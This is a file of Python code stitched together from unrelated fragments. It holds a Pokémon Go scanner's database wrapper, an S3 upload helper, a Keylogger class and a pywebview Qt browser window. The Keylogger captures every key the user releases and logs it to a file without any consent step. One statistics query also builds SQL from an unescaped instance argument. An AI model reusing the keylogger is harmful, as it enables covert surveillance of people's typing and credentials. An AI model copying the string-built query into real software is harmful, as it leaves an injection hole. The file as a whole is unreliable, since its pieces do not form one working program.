            for i in range(len(to_return)):
                to_return[i][0] = list_of_coords[i][0]
                to_return[i][1] = list_of_coords[i][1]
            return to_return

    def get_undetected_spawns(self, geofence_helper):
        # Same as get_detected_spawns, but restricted to spawnpoints without
        # a calculated endtime.
        log.debug("{DbWrapperBase::get_undetected_spawns} called")
        query = ("SELECT latitude, longitude "
                 "FROM trs_spawn "
                 "WHERE calc_endminsec is NULL")
        list_of_coords = []
        log.debug(
            "{DbWrapperBase::get_undetected_spawns} executing select query")
        res = self.execute(query)
        log.debug(
            "{DbWrapperBase::get_undetected_spawns} result of query: %s"
            % str(res))
        for (latitude, longitude) in res:
            list_of_coords.append([latitude, longitude])
        if geofence_helper is not None:
            log.debug(
                "{DbWrapperBase::get_undetected_spawns} applying geofence")
            geofenced_coords = geofence_helper.get_geofenced_coordinates(
                list_of_coords)
            log.debug(geofenced_coords)
            return geofenced_coords
        else:
            log.debug(
                "{DbWrapperBase::get_undetected_spawns} converting to numpy")
            to_return = np.zeros(shape=(len(list_of_coords), 2))
            for i in range(len(to_return)):
                to_return[i][0] = list_of_coords[i][0]
                to_return[i][1] = list_of_coords[i][1]
            return to_return

    def get_detected_endtime(self, spawn_id):
        # calc_endminsec string for the spawnpoint, or False when unknown.
        log.debug("{DbWrapperBase::get_detected_endtime} called")
        query = ("SELECT calc_endminsec "
                 "FROM trs_spawn "
                 "WHERE spawnpoint=%s")
        args = (spawn_id, )
        found = self.execute(query, args)
        if found and len(found) > 0 and found[0][0]:
            return str(found[0][0])
        else:
            return False

    def _gen_endtime(self, known_despawn):
        # Convert a "MM:SS" despawn string to the next matching wall-clock
        # unix timestamp (rolls over to the next hour when already passed).
        hrmi = known_despawn.split(':')
        known_despawn = datetime.now().replace(
            hour=0, minute=int(hrmi[0]), second=int(hrmi[1]), microsecond=0)
        now = datetime.now()
        if now.minute <= known_despawn.minute:
            despawn = now + timedelta(
                minutes=known_despawn.minute - now.minute,
                seconds=known_despawn.second - now.second)
        elif now.minute > known_despawn.minute:
            despawn = now + timedelta(hours=1) - timedelta(
                minutes=(now.minute - known_despawn.minute),
                seconds=now.second - known_despawn.second)
        else:
            return None
        return time.mktime(despawn.timetuple())

    def _get_min_pos_in_array(self):
        # Quarter-hour slot of the current minute mapped to bit positions
        # 4..7 of the spawndef bitmask.  NOTE(review): `min` shadows the
        # builtin; harmless here but worth renaming.
        min = datetime.now().strftime("%M")
        if 0 <= int(min) < 15:
            pos = 4
        elif 15 <= int(min) < 30:
            pos = 5
        elif 30 <= int(min) < 45:
            pos = 6
        elif 45 <= int(min) < 60:
            pos = 7
        else:
            pos = None
        self.__globaldef = pos
        return pos

    def _set_spawn_see_minutesgroup(self, spawndef, pos):
        # Flip the "seen in this quarter-hour" bit (pos) on in the 8-bit
        # spawndef mask and clear the paired bit (pos - 4).
        # b = BitArray([int(digit) for digit in bin(spawndef)[2:]])
        b = BitArray(uint=spawndef, length=8)
        if pos == 4:
            b[0] = 0
            b[4] = 1
        if pos == 5:
            b[1] = 0
            b[5] = 1
        if pos == 6:
            b[2] = 0
            b[6] = 1
        if pos == 7:
            b[3] = 0
            b[7] = 1
        return b.uint

    def check_and_create_spawn_tables(self):
        # Create trs_spawn and trs_spawnsightings if missing.
        log.debug("{DbWrapperBase::check_and_create_spawn_tables} called")
        query_trs_spawn = (
            'CREATE TABLE IF NOT EXISTS `trs_spawn` ('
            '`spawnpoint` varchar(16) COLLATE utf8mb4_unicode_ci NOT NULL, '
            '`latitude` double NOT NULL, '
            '`longitude` double NOT NULL, '
            '`spawndef` int(11) NOT NULL DEFAULT "240", '
            '`earliest_unseen` int(6) NOT NULL, '
            '`last_scanned` datetime DEFAULT NULL, '
            '`first_detection` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP, '
            '`last_non_scanned` datetime DEFAULT NULL, '
            '`calc_endminsec` varchar(5) COLLATE utf8mb4_unicode_ci DEFAULT NULL, '
            'UNIQUE KEY `spawnpoint_2` (`spawnpoint`), '
            'KEY `spawnpoint` (`spawnpoint`) '
            ') ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;'
        )
        query_trs_spawnsightings = (
            'CREATE TABLE IF NOT EXISTS `trs_spawnsightings` ('
            '`id` int(11) NOT NULL AUTO_INCREMENT, '
            '`encounter_id` bigint(20) UNSIGNED NOT NULL, '
            '`spawnpoint_id` bigint(20) UNSIGNED NOT NULL, '
            '`scan_time` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP, '
            '`tth_secs` int(11) DEFAULT NULL, '
            'PRIMARY KEY (`id`), '
            'KEY `trs_spawnpointdd_spawnpoint_id` (`spawnpoint_id`) '
            ') ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;'
        )
        self.execute(query_trs_spawn, commit=True)
        self.execute(query_trs_spawnsightings, commit=True)

    def download_spawns(self):
        # Dump all spawnpoints as a pretty-printed JSON string.
        log.debug("dbWrapper::download_spawns")
        spawn = {}
        query = ("SELECT spawnpoint, latitude, longitude, calc_endminsec, "
                 "spawndef, last_scanned "
                 "FROM `trs_spawn`")
        res = self.execute(query)
        for (spawnid, lat, lon, endtime, spawndef, last_scanned) in res:
            spawn[spawnid] = {
                'lat': lat,
                'lon': lon,
                'endtime': endtime,
                'spawndef': spawndef,
                'lastscan': str(last_scanned)
            }
        return str(json.dumps(spawn, indent=4, sort_keys=True))

    def retrieve_next_spawns(self, geofence_helper):
        """
        Retrieve the spawnpoints with their respective unixtimestamp that are
        due in the next 300 seconds
        :return:
        """
        current_time_of_day = datetime.now().replace(microsecond=0)
        log.debug("DbWrapperBase::retrieve_next_spawns called")
        query = (
            "SELECT latitude, longitude, spawndef, calc_endminsec FROM trs_spawn WHERE calc_endminsec IS NOT NULL and "
            "DATE_FORMAT(STR_TO_DATE(calc_endminsec,'%i:%s'),'%i:%s') between DATE_FORMAT(DATE_ADD(NOW(), "
            "INTERVAL if(spawndef=15,60,30) MINUTE),'%i:%s') and DATE_FORMAT(DATE_ADD(NOW(), "
            "INTERVAL if(spawndef=15,70,40) MINUTE),'%i:%s')")
        res = self.execute(query)
        next_up = []
        current_time = time.time()
        for (latitude, longitude, spawndef, calc_endminsec) in res:
            if geofence_helper and not geofence_helper.is_coord_inside_include_geofence(
                    [latitude, longitude]):
                continue
            endminsec_split = calc_endminsec.split(":")
            minutes = int(endminsec_split[0])
            seconds = int(endminsec_split[1])
            temp_date = current_time_of_day.replace(minute=minutes,
                                                    second=seconds)
            if minutes < datetime.now().minute:
                temp_date = temp_date + timedelta(hours=1)
            if temp_date < current_time_of_day:
                # spawn has already happened, we should've added it in the past, let's move on
                # TODO: consider crosschecking against current mons...
                continue
            # 60-minute spawns have spawndef 15, everything else spawns 30min.
            spawn_duration_minutes = 60 if spawndef == 15 else 30
            timestamp = time.mktime(
                temp_date.timetuple()) - spawn_duration_minutes * 60
            # check if we calculated a time in the past, if so, add an hour to it...
            timestamp = timestamp + 60 * 60 if timestamp < current_time else timestamp
            # TODO: consider the following since I am not sure if the prio Q clustering handles stuff properly yet
            # if timestamp >= current_time + 600:
            #     # let's skip monspawns that are more than 10minutes in the future
            #     continue
            next_up.append((timestamp, Location(latitude, longitude)))
        return next_up

    def submit_quest_proto(self, map_proto):
        # Upsert the quest carried by a fort's challenge_quest proto and
        # (optionally) fire the quest webhook.
        log.debug("{DbWrapperBase::submit_quest_proto} called")
        fort_id = map_proto.get("fort_id", None)
        if fort_id is None:
            return False
        if 'challenge_quest' not in map_proto:
            return False
        quest_type = map_proto['challenge_quest']['quest'].get(
            "quest_type", None)
        if map_proto['challenge_quest']['quest'].get("quest_rewards", None):
            rewardtype = map_proto['challenge_quest']['quest'][
                'quest_rewards'][0].get("type", None)
            reward = map_proto['challenge_quest']['quest'].get(
                "quest_rewards", None)
            item = map_proto['challenge_quest']['quest']['quest_rewards'][0][
                'item'].get("item", None)
            itemamount = map_proto['challenge_quest']['quest'][
                'quest_rewards'][0]['item'].get("amount", None)
            stardust = map_proto['challenge_quest']['quest']['quest_rewards'][
                0].get("stardust", None)
            pokemon_id = map_proto['challenge_quest']['quest'][
                'quest_rewards'][0]['pokemon_encounter'].get(
                    "pokemon_id", None)
            target = map_proto['challenge_quest']['quest']['goal'].get(
                "target", None)
            condition = map_proto['challenge_quest']['quest']['goal'].get(
                "condition", None)
            task = questtask(int(quest_type), str(condition), int(target))
            query_quests = (
                "INSERT into trs_quest (GUID, quest_type, quest_timestamp, quest_stardust, quest_pokemon_id, "
                "quest_reward_type, quest_item_id, quest_item_amount, quest_target, quest_condition, quest_reward, "
                "quest_task) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
                "ON DUPLICATE KEY UPDATE quest_type=VALUES(quest_type), quest_timestamp=VALUES(quest_timestamp), "
                "quest_stardust=VALUES(quest_stardust), quest_pokemon_id=VALUES(quest_pokemon_id), "
                "quest_reward_type=VALUES(quest_reward_type), quest_item_id=VALUES(quest_item_id), "
                "quest_item_amount=VALUES(quest_item_amount), quest_target=VALUES(quest_target), "
                "quest_condition=VALUES(quest_condition), quest_reward=VALUES(quest_reward), "
                "quest_task=VALUES(quest_task)")
            vals = (fort_id, quest_type, time.time(), stardust, pokemon_id,
                    rewardtype, item, itemamount, target, str(condition),
                    str(reward), task)
            log.debug(
                "{DbWrapperBase::submit_quest_proto} submitted quest typ %s at stop %s"
                % (str(quest_type), str(fort_id)))
            self.execute(query_quests, vals, commit=True)
            if self.application_args.webhook and self.application_args.quest_webhook:
                log.debug('Sending quest webhook for pokestop {0}'.format(
                    str(fort_id)))
                self.webhook_helper.submit_quest_webhook(
                    self.quests_from_db(GUID=fort_id))
            else:
                log.debug('Sending Webhook is disabled')
        return True

    def create_status_database_if_not_exists(self):
        # Worker-status table keyed by origin.
        log.debug(
            "{DbWrapperBase::create_status_database_if_not_exists} called")
        query = (' Create table if not exists trs_status ( '
                 'origin VARCHAR(50) NOT NULL , '
                 ' currentPos VARCHAR(50) NULL DEFAULT NULL, '
                 ' lastPos VARCHAR(50) NULL DEFAULT NULL, '
                 ' routePos INT(11) NULL DEFAULT NULL, '
                 ' routeMax INT(11) NULL DEFAULT NULL, '
                 ' routemanager VARCHAR(255) NULL DEFAULT NULL, '
                 ' rebootCounter INT(11) NULL DEFAULT NULL, '
                 ' lastProtoDateTime VARCHAR(50) NULL DEFAULT NULL, '
                 ' lastPogoRestart VARCHAR(50) NULL DEFAULT NULL, '
                 ' init TEXT NOT NULL, '
                 ' rebootingOption TEXT NOT NULL, '
                 ' restartCounter TEXT NOT NULL, '
                 ' PRIMARY KEY (origin))')
        self.execute(query, commit=True)
        return True

    def create_usage_database_if_not_exists(self):
        # Resource-usage samples table.
        log.debug(
            "{DbWrapperBase::create_usage_database_if_not_exists} called")
        query = ('CREATE TABLE if not exists trs_usage ( '
                 'usage_id INT(10) AUTO_INCREMENT , '
                 'instance varchar(100) NULL DEFAULT NULL, '
                 'cpu FLOAT NULL DEFAULT NULL , '
                 'memory FLOAT NULL DEFAULT NULL , '
                 'garbage INT(5) NULL DEFAULT NULL , '
                 'timestamp INT(11) NULL DEFAULT NULL, '
                 'PRIMARY KEY (usage_id))')
        self.execute(query, commit=True)
        return True

    def insert_usage(self, instance, cpu, mem, garbage, timestamp):
        # Append one resource-usage sample.
        log.debug("dbWrapper::insert_usage")
        query = (
            "INSERT into trs_usage (instance, cpu, memory, garbage, timestamp) VALUES "
            "(%s, %s, %s, %s, %s)")
        vals = (instance, cpu, mem, garbage, timestamp)
        self.execute(query, vals, commit=True)
        return

    def save_status(self, data):
        # Upsert one worker-status row from the `data` dict.
        log.debug("dbWrapper::save_status")
        query = (
            "INSERT into trs_status (origin, currentPos, lastPos, routePos, routeMax, "
            "routemanager, rebootCounter, lastProtoDateTime, "
            "init, rebootingOption, restartCounter) values "
            "(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
            "ON DUPLICATE KEY UPDATE currentPos=VALUES(currentPos), "
            "lastPos=VALUES(lastPos), routePos=VALUES(routePos), "
            "routeMax=VALUES(routeMax), routemanager=VALUES(routemanager), "
            "rebootCounter=VALUES(rebootCounter), lastProtoDateTime=VALUES(lastProtoDateTime), "
            "init=VALUES(init), rebootingOption=VALUES(rebootingOption), restartCounter=VALUES(restartCounter)"
        )
        vals = (data["Origin"], str(data["CurrentPos"]), str(data["LastPos"]),
                data["RoutePos"], data["RouteMax"], data["Routemanager"],
                data["RebootCounter"], data["LastProtoDateTime"],
                data["Init"], data["RebootingOption"], data["RestartCounter"])
        self.execute(query, vals, commit=True)
        return

    def save_last_reboot(self, origin):
        # Record a Pogo reboot and increment the global counter.
        log.debug("dbWrapper::save_last_reboot")
        now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        query = (
            "insert into trs_status(origin, lastPogoReboot, globalrebootcount) "
            "values (%s, %s, %s) "
            "ON DUPLICATE KEY UPDATE lastPogoReboot=VALUES(lastPogoReboot), globalrebootcount=(globalrebootcount+1)"
        )
        vals = (origin, now, 1)
        self.execute(query, vals, commit=True)
        return

    def save_last_restart(self, origin):
        # Record a Pogo restart and increment the global counter.
        log.debug("dbWrapper::save_last_restart")
        now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        query = (
            "insert into trs_status(origin, lastPogoRestart, globalrestartcount) "
            "values (%s, %s, %s) "
            "ON DUPLICATE KEY UPDATE lastPogoRestart=VALUES(lastPogoRestart), globalrestartcount=(globalrestartcount+1)"
        )
        vals = (origin, now, 1)
        self.execute(query, vals, commit=True)
        return

    def download_status(self):
        # All worker-status rows as a pretty-printed JSON string.
        log.debug("dbWrapper::download_status")
        workerstatus = []
        query = (
            "SELECT origin, currentPos, lastPos, routePos, routeMax, "
            "routemanager, rebootCounter, lastProtoDateTime, lastPogoRestart, "
            "init, rebootingOption, restartCounter, globalrebootcount, globalrestartcount, lastPogoReboot "
            "FROM trs_status")
        result = self.execute(query)
        for (origin, currentPos, lastPos, routePos, routeMax, routemanager,
                rebootCounter, lastProtoDateTime, lastPogoRestart, init,
                rebootingOption, restartCounter, globalrebootcount,
                globalrestartcount, lastPogoReboot) in result:
            status = {
                "origin": origin,
                "currentPos": currentPos,
                "lastPos": lastPos,
                "routePos": routePos,
                "routeMax": routeMax,
                "routemanager": routemanager,
                "rebootCounter": rebootCounter,
                "lastProtoDateTime": str(lastProtoDateTime),
                "lastPogoRestart": str(lastPogoRestart),
                "init": init,
                "rebootingOption": rebootingOption,
                "restartCounter": restartCounter,
                "lastPogoReboot": lastPogoReboot,
                "globalrebootcount": globalrebootcount,
                "globalrestartcount": globalrestartcount
            }
            workerstatus.append(status)
        return str(json.dumps(workerstatus, indent=4, sort_keys=True))

    def statistics_get_quests_count(self, days):
        # Hourly quest counts, optionally restricted to the last `days` days.
        log.debug('Fetching quests count from db')
        query_where = ''
        query_date = "unix_timestamp(DATE_FORMAT(FROM_UNIXTIME(quest_timestamp), '%y-%m-%d %k:00:00')) * 1000 " \
                     "as Timestamp"
        if days:
            days = datetime.utcnow() - timedelta(days=days)
            query_where = ' WHERE FROM_UNIXTIME(quest_timestamp) > \'%s\' ' % str(
                days)
        query = (
            "SELECT %s, count(GUID) as Count FROM trs_quest %s "
            "group by day(FROM_UNIXTIME(quest_timestamp)), hour(FROM_UNIXTIME(quest_timestamp))"
            "order by quest_timestamp" % (str(query_date), str(query_where)))
        res = self.execute(query)
        return res

    def statistics_get_usage_count(self, minutes=120, instance=None):
        # Usage samples of the last `minutes`, optionally for one instance.
        log.debug('Fetching usage from db')
        query_where = ''
        if minutes:
            days = datetime.now() - timedelta(minutes=int(minutes))
            query_where = ' WHERE FROM_UNIXTIME(timestamp) > \'%s\' ' % str(
                days)
            # NOTE(review): the instance filter only applies together with a
            # minutes window — confirm this nesting matches the original.
            if instance is not None:
                query_where = query_where + ' and instance = \'%s\' ' % str(
                    instance)
        query = (
            "SELECT cpu, memory, garbage, timestamp, instance FROM trs_usage %s "
            "order by timestamp" % (str(query_where)))
        res = self.execute(query)
        return res
def upload_output_to_s3(bucketName, filePrefix, fileExt):
    """Upload every output file with extension *fileExt* from DEFAULT_OUTPUT_DIR to S3.

    Objects are stored under ``bucketName/filePrefix/<fileName>`` with
    REDUCED_REDUNDANCY storage.  At most MAX_PARALLEL_UPLOADS uploads run
    concurrently (bounded by a semaphore); a progress bar reports completion.
    Locally kept files are removed after upload unless DEFAULT_KEEP_OUTPUT.

    :param bucketName: target S3 bucket name
    :param filePrefix: key prefix inside the bucket
    :param fileExt: extension filter passed to list_output_files()
    :return: tuple (uploadFileCount, totalSize) — files uploaded, bytes summed
    """
    print('Uploading files to S3: {:s}/{:s}'.format(bucketName, filePrefix))
    s3 = boto3.client('s3', config=botocore.client.Config(
        max_pool_connections=MAX_PARALLEL_UPLOADS))

    global uploadFileCount
    uploadFileCount = 0
    countLock = Lock()
    totalSize = 0
    results = []

    pool = ThreadPool(MAX_PARALLEL_UPLOADS)
    sema = Semaphore(MAX_PARALLEL_UPLOADS)

    maxval = sum(1 for _ in list_output_files(DEFAULT_OUTPUT_DIR, fileExt))
    bar = progressbar.ProgressBar(maxval=maxval, widgets=[
        progressbar.Bar('=', 'Uploaded [', ']'), ' ',
        progressbar.Percentage()
    ])
    bar.start()

    def upload_file(localFilePath, uploadFileName, fileSize):
        # Bound concurrent S3 PUTs; release in `finally` so an upload error
        # cannot leak a semaphore slot.
        sema.acquire()
        try:
            with open(localFilePath, 'rb') as ifs:
                s3.put_object(Body=ifs, Bucket=bucketName,
                              Key=uploadFileName,
                              StorageClass='REDUCED_REDUNDANCY')
        finally:
            sema.release()
        global uploadFileCount
        with countLock:
            uploadFileCount += 1
            bar.update(uploadFileCount)
        if not DEFAULT_KEEP_OUTPUT:
            os.remove(localFilePath)

    for fileName in list_output_files(DEFAULT_OUTPUT_DIR, fileExt):
        localFilePath = os.path.join(DEFAULT_OUTPUT_DIR, fileName)
        uploadFileName = os.path.join(filePrefix, fileName)
        fileSize = os.path.getsize(localFilePath)
        result = pool.apply_async(
            upload_file, args=(localFilePath, uploadFileName, fileSize))
        results.append(result)
        totalSize += fileSize

    # Block until all workers are done; .get() re-raises worker exceptions.
    for result in results:
        result.get()

    # Drain the semaphore so every in-flight upload has released its slot.
    # FIX: the original used Python-2 `xrange`, which raises NameError on
    # Python 3 (this file uses f-strings elsewhere, so it runs on Python 3).
    for _ in range(MAX_PARALLEL_UPLOADS):
        sema.acquire()

    bar.finish()
    print('Uploaded {:d} files to S3 [total={:d}KB]'.format(
        uploadFileCount, totalSize >> 10))
    return (uploadFileCount, totalSize)
class Keylogger:
    """Record keyboard keystrokes and periodically flush them to a file.

    Hooks the `keyboard` library's on_release event; every `interval`
    seconds the accumulated log is appended to ``keystroke.txt``.
    """

    def __init__(self, interval):
        # seconds between two reports (we pass SEND_REPORT_EVERY here)
        self.interval = interval
        # string accumulating all keystrokes within `self.interval`
        self.log = ""
        # used solely to block the main thread after installing the
        # on_release listener; it is never released
        self.semaphore = Semaphore(0)

    def callback(self, event):
        """
        This callback is invoked whenever a keyboard event occurs
        (i.e. when a key is released in this example); it appends a
        printable representation of the key to ``self.log``.
        """
        name = event.name
        if len(name) > 1:
            # not a character, special key (e.g ctrl, alt, etc.)
            # uppercase with []
            if name == "space":
                # " " instead of "space"
                name = " "
            elif name == "enter":
                # add a new line whenever an ENTER is pressed
                name = "[ENTER]\n"
            elif name == "decimal":
                name = "."
            else:
                # replace spaces with underscores
                name = name.replace(" ", "_")
                name = f"[{name.upper()}]"
        self.log += name

    def sendkeys(self, message):
        """Append *message* to the local keystroke file."""
        # FIX: use a context manager so the handle is closed even if the
        # write raises (the original relied on an explicit close()).
        with open("keystroke.txt", "a") as f:
            f.write(message)

    def report(self):
        """
        This function gets called every `self.interval`.
        It basically sends keylogs and resets the `self.log` variable.
        """
        if self.log:
            # if there is something in log, report it
            self.sendkeys(self.log)
            self.log = ""
        Timer(interval=self.interval, function=self.report).start()

    def start(self):
        # start the keylogger
        keyboard.on_release(callback=self.callback)
        # start reporting the keylogs
        self.report()
        # on_release() starts its listener in a separate thread and does not
        # block; block the current thread forever so the process stays alive
        self.semaphore.acquire()
class BrowserView(QMainWindow):
    """Qt-backed browser window (one instance per pywebview window).

    GUI work must happen on the Qt main thread, so the public API methods
    (load_url, evaluate_js, create_file_dialog, ...) emit pyqtSignal
    "triggers"; their connected ``on_*`` slots run on the main thread and
    hand results back to the calling thread through semaphores.
    """

    # All open windows, keyed by uid.
    instances = {}
    inspector_port = None  # The localhost port at which the Remote debugger listens

    # Cross-thread triggers; each is connected to the matching on_* slot.
    create_window_trigger = QtCore.pyqtSignal(object)
    set_title_trigger = QtCore.pyqtSignal(str)
    load_url_trigger = QtCore.pyqtSignal(str)
    html_trigger = QtCore.pyqtSignal(str, str)
    dialog_trigger = QtCore.pyqtSignal(int, str, bool, str, str)
    destroy_trigger = QtCore.pyqtSignal()
    fullscreen_trigger = QtCore.pyqtSignal()
    window_size_trigger = QtCore.pyqtSignal(int, int)
    window_move_trigger = QtCore.pyqtSignal(int, int)
    current_url_trigger = QtCore.pyqtSignal()
    evaluate_js_trigger = QtCore.pyqtSignal(str, str)

    class JSBridge(QtCore.QObject):
        """Object exposed to page JavaScript as ``external``; routes JS
        calls into Python via js_bridge_call."""
        # QtWebEngine delivers JSON values; QtWebKit delivers plain strings.
        qtype = QtCore.QJsonValue if is_webengine else str

        def __init__(self):
            super(BrowserView.JSBridge, self).__init__()

        @QtCore.pyqtSlot(str, qtype, str, result=str)
        def call(self, func_name, param, value_id):
            func_name = BrowserView._convert_string(func_name)
            param = BrowserView._convert_string(param)
            return js_bridge_call(self.window, func_name, param, value_id)

    class WebView(QWebView):
        def __init__(self, parent=None):
            super(BrowserView.WebView, self).__init__(parent)

            # Frameless windows have no title bar, so mouse events are
            # intercepted app-wide to implement window dragging.
            if parent.frameless:
                QApplication.instance().installEventFilter(self)
                self.setMouseTracking(True)

        def contextMenuEvent(self, event):
            menu = self.page().createStandardContextMenu()

            # If 'Inspect Element' is present in the default context menu, it
            # means the inspector is already up and running.
            for i in menu.actions():
                if i.text() == 'Inspect Element':
                    break
            else:
                # Inspector is not up yet, so create a pseudo 'Inspect Element'
                # menu that will fire it up.
                inspect_element = QAction('Inspect Element', menu)
                inspect_element.triggered.connect(self.show_inspector)
                menu.addAction(inspect_element)

            menu.exec_(event.globalPos())

        # Create a new webview window pointing at the Remote debugger server
        def show_inspector(self):
            uid = self.parent().uid + '-inspector'
            try:
                # If inspector already exists, bring it to the front
                BrowserView.instances[uid].raise_()
                BrowserView.instances[uid].activateWindow()
            except KeyError:
                title = 'Web Inspector - {}'.format(self.parent().title)
                url = 'http://localhost:{}'.format(BrowserView.inspector_port)
                window = Window('web_inspector', title, url, '', 700, 500, True, False, (300, 200), False, '#fff', None, False, False)

                inspector = BrowserView(window)
                inspector.show()

        def mousePressEvent(self, event):
            # Remember the press offset for frameless-window dragging.
            if event.button() == QtCore.Qt.LeftButton:
                self.drag_pos = event.globalPos() - self.parent().frameGeometry().topLeft()

            event.accept()

        def mouseMoveEvent(self, event):
            if self.parent().frameless and int(event.buttons()) == 1:  # left button is pressed
                self.parent().move(event.globalPos() - self.drag_pos)

        def eventFilter(self, object, event):
            # Forward mouse events from child widgets so dragging works
            # anywhere in the frameless window; never consume the event.
            if object.parent() == self:
                if event.type() == QtCore.QEvent.MouseMove:
                    self.mouseMoveEvent(event)
                elif event.type() == QtCore.QEvent.MouseButtonPress:
                    self.mousePressEvent(event)

            return False

    # New-window-requests handler for Qt 5.5+ only
    class NavigationHandler(QWebPage):
        def __init__(self, parent=None):
            super(BrowserView.NavigationHandler, self).__init__(parent)

        def acceptNavigationRequest(self, url, type, is_main_frame):
            # Open new-window navigation in the system browser instead.
            webbrowser.open(url.toString(), 2, True)
            return False

    class WebPage(QWebPage):
        def __init__(self, parent=None):
            super(BrowserView.WebPage, self).__init__(parent)
            self.nav_handler = BrowserView.NavigationHandler(self) if is_webengine else None

        if not is_webengine:
            # QtWebKit path: frame is None for new-window requests.
            def acceptNavigationRequest(self, frame, request, type):
                if frame is None:
                    webbrowser.open(request.url().toString(), 2, True)
                    return False
                return True

        def createWindow(self, type):
            return self.nav_handler

    def __init__(self, window):
        super(BrowserView, self).__init__()
        BrowserView.instances[window.uid] = self
        self.uid = window.uid
        self.pywebview_window = window

        self.js_bridge = BrowserView.JSBridge()
        self.js_bridge.window = window

        self.is_fullscreen = False
        self.confirm_close = window.confirm_close
        self.text_select = window.text_select

        # Released by the on_* slots to unblock the calling thread.
        self._file_name_semaphore = Semaphore(0)
        self._current_url_semaphore = Semaphore(0)

        self.loaded = window.loaded
        self.shown = window.shown

        self._js_results = {}
        self._current_url = None
        self._file_name = None

        self.resize(window.width, window.height)
        self.title = window.title
        self.setWindowTitle(window.title)

        # Set window background color
        self.background_color = QColor()
        self.background_color.setNamedColor(window.background_color)
        palette = self.palette()
        palette.setColor(self.backgroundRole(), self.background_color)
        self.setPalette(palette)

        if not window.resizable:
            self.setFixedSize(window.width, window.height)

        self.setMinimumSize(window.min_size[0], window.min_size[1])

        self.frameless = window.frameless
        if self.frameless:
            self.setWindowFlags(QtCore.Qt.Window | QtCore.Qt.FramelessWindowHint)

        self.view = BrowserView.WebView(self)

        if _debug and is_webengine:
            # Initialise Remote debugging (need to be done only once)
            if not BrowserView.inspector_port:
                BrowserView.inspector_port = BrowserView._get_free_port()
                os.environ['QTWEBENGINE_REMOTE_DEBUGGING'] = BrowserView.inspector_port
        else:
            self.view.setContextMenuPolicy(QtCore.Qt.NoContextMenu)  # disable right click context menu

        self.view.setPage(BrowserView.WebPage(self.view))
        self.view.page().loadFinished.connect(self.on_load_finished)

        self.setCentralWidget(self.view)

        # Wire every cross-thread trigger to its main-thread slot.
        self.create_window_trigger.connect(BrowserView.on_create_window)
        self.load_url_trigger.connect(self.on_load_url)
        self.html_trigger.connect(self.on_load_html)
        self.dialog_trigger.connect(self.on_file_dialog)
        self.destroy_trigger.connect(self.on_destroy_window)
        self.fullscreen_trigger.connect(self.on_fullscreen)
        self.window_size_trigger.connect(self.on_window_size)
        self.window_move_trigger.connect(self.on_window_move)
        self.current_url_trigger.connect(self.on_current_url)
        self.evaluate_js_trigger.connect(self.on_evaluate_js)
        self.set_title_trigger.connect(self.on_set_title)

        if is_webengine and platform.system() != 'OpenBSD':
            self.channel = QWebChannel(self.view.page())
            self.view.page().setWebChannel(self.channel)

        if window.fullscreen:
            self.toggle_fullscreen()

        if window.url is not None:
            self.view.setUrl(QtCore.QUrl(window.url))
        elif window.html:
            self.view.setHtml(window.html, QtCore.QUrl(''))
        else:
            self.view.setHtml(default_html, QtCore.QUrl(''))

        if window.x is not None and window.y is not None:
            self.move(window.x, window.y)
        else:
            # Center the window on the available desktop geometry.
            center = QApplication.desktop().availableGeometry().center() - self.rect().center()
            self.move(center.x(), center.y())

        self.activateWindow()
        self.raise_()
        self.shown.set()

    def on_set_title(self, title):
        self.setWindowTitle(title)

    def on_file_dialog(self, dialog_type, directory, allow_multiple, save_filename, file_filter):
        # Runs on the main thread; stores the result and releases the
        # semaphore create_file_dialog() is blocked on.
        if dialog_type == FOLDER_DIALOG:
            self._file_name = QFileDialog.getExistingDirectory(
                self, localization['linux.openFolder'],
                options=QFileDialog.ShowDirsOnly)
        elif dialog_type == OPEN_DIALOG:
            if allow_multiple:
                self._file_name = QFileDialog.getOpenFileNames(
                    self, localization['linux.openFiles'], directory, file_filter)
            else:
                self._file_name = QFileDialog.getOpenFileName(
                    self, localization['linux.openFile'], directory, file_filter)
        elif dialog_type == SAVE_DIALOG:
            if directory:
                save_filename = os.path.join(str(directory), str(save_filename))

            self._file_name = QFileDialog.getSaveFileName(
                self, localization['global.saveFile'], save_filename)

        self._file_name_semaphore.release()

    def on_current_url(self):
        url = BrowserView._convert_string(self.view.url().toString())
        # Internal data: URLs are reported as "no URL loaded".
        self._current_url = None if url == '' or url.startswith('data:text/html') else url
        self._current_url_semaphore.release()

    def on_load_url(self, url):
        self.view.setUrl(QtCore.QUrl(url))

    def on_load_html(self, content, base_uri):
        self.view.setHtml(content, QtCore.QUrl(base_uri))

    def closeEvent(self, event):
        if self.confirm_close:
            reply = QMessageBox.question(
                self, self.title, localization['global.quitConfirmation'],
                QMessageBox.Yes, QMessageBox.No)

            if reply == QMessageBox.No:
                event.ignore()
                return

        event.accept()
        del BrowserView.instances[self.uid]

        if self.pywebview_window in windows:
            windows.remove(self.pywebview_window)

        try:
            # Close inspector if open
            BrowserView.instances[self.uid + '-inspector'].close()
            del BrowserView.instances[self.uid + '-inspector']
        except KeyError:
            pass

        # Last window closed: shut down the Qt application.
        if len(BrowserView.instances) == 0:
            self.hide()
            _app.exit()

    def on_destroy_window(self):
        self.close()

    def on_fullscreen(self):
        if self.is_fullscreen:
            self.showNormal()
        else:
            self.showFullScreen()

        self.is_fullscreen = not self.is_fullscreen

    def on_window_size(self, width, height):
        self.setFixedSize(width, height)

    def on_window_move(self, x, y):
        self.move(x, y)

    def on_evaluate_js(self, script, uuid):
        def return_result(result):
            # Normalise the JS result: None/'null' -> None, '' kept as-is,
            # anything else parsed as JSON; then wake the waiting thread.
            result = BrowserView._convert_string(result)
            uuid_ = BrowserView._convert_string(uuid)

            js_result = self._js_results[uuid_]
            js_result['result'] = None if result is None or result == 'null' else result if result == '' else json.loads(result)
            js_result['semaphore'].release()

        try:  # < Qt5.6
            result = self.view.page().mainFrame().evaluateJavaScript(script)
            return_result(result)
        except AttributeError:
            # Qt 5.6+ (QtWebEngine): async evaluation with a callback.
            self.view.page().runJavaScript(script, return_result)
        except Exception as e:
            print(e)

    def on_load_finished(self):
        self._set_js_api()

